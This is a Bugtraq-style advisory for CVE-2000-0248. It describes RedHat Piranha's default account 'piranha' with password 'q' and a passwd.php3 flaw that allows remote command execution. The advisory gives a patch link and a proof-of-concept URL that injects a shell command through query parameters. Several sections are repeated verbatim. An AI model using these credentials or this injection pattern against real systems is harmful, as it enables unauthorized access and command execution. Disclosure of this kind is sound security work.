RedHat Piranha Virtual Server Package Default Account and Password Vulnerability
BID:1148
Info
RedHat Piranha Virtual Server Package Default Account and Password Vulnerability
| Bugtraq ID: | 1148 |
| Class: | Configuration Error |
| CVE: |
CVE-2000-0248 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 24 2000 12:00AM |
| Updated: | Jul 11 2009 01:56AM |
| Credit: | This vulnerability was announced in an advisory from ISS on April 24, 2000. Exploit information was made available in a Bugtraq post on April 24, 2000 by Max Vision <[email protected]> |
| Vulnerable: |
Redhat piranha-gui-0.4.12-1.i386.rpm Redhat Linux 6.2 sparc Redhat Linux 6.2 i386 Redhat Linux 6.2 alpha |
| Not Vulnerable: | |
Discussion
RedHat Piranha Virtual Server Package Default Account and Password Vulnerability
A default username and password has been discovered in the Piranha virtual server and load balancing package from RedHat. Version 0.4.12 of the piranha-gui program contains a default account, piranha, with the password 'q' (no quotes). Using this username and password, in conjunction with flaws in the passwd.php3 script (also part of piranha) will allow remote users to execute arbitrary commands on the machine.
A default username and password has been discovered in the Piranha virtual server and load balancing package from RedHat. Version 0.4.12 of the piranha-gui program contains a default account, piranha, with the password 'q' (no quotes). Using this username and password, in conjunction with flaws in the passwd.php3 script (also part of piranha) will allow remote users to execute arbitrary commands on the machine.
Exploit / POC
RedHat Piranha Virtual Server Package Default Account and Password Vulnerability
The default username and password are piranha, and q, respectively.
Execute the following url, using the above information to authenticate: http://victim.example.com/piranha/secure/passwd.php3
Next, execute the following: http://victim.example.com/piranha/secure/passwd.php3?try1=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&try2=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&passwd=ACCEPT
This will touch a file in /tmp named r00ted. More complex attacks are certainly possible.
The default username and password are piranha, and q, respectively.
Execute the following url, using the above information to authenticate: http://victim.example.com/piranha/secure/passwd.php3
Next, execute the following: http://victim.example.com/piranha/secure/passwd.php3?try1=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&try2=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&passwd=ACCEPT
This will touch a file in /tmp named r00ted. More complex attacks are certainly possible.
Solution / Fix
RedHat Piranha Virtual Server Package Default Account and Password Vulnerability
Solution:
A patch is available from RedHat
Redhat piranha-gui-0.4.12-1.i386.rpm
Redhat Linux 6.2 i386
Solution:
A patch is available from RedHat
Redhat piranha-gui-0.4.12-1.i386.rpm
-
Red Hat Inc. 6.2 i386 piranha-gui-0.4.13-1.i386.rpm
ftp://updates.redhat.com/6.2/i386/piranha-gui-0.4.13-1.i386.rpm
Redhat Linux 6.2 i386
-
Red Hat Inc. 6.2 i386 piranha-gui-0.4.13-1.i386.rpm
ftp://updates.redhat.com/6.2/i386/piranha-gui-0.4.13-1.i386.rpm
References
RedHat Piranha Virtual Server Package Default Account and Password Vulnerability
References:
References:
- Updates, Fixes, and Errata Page (RedHat)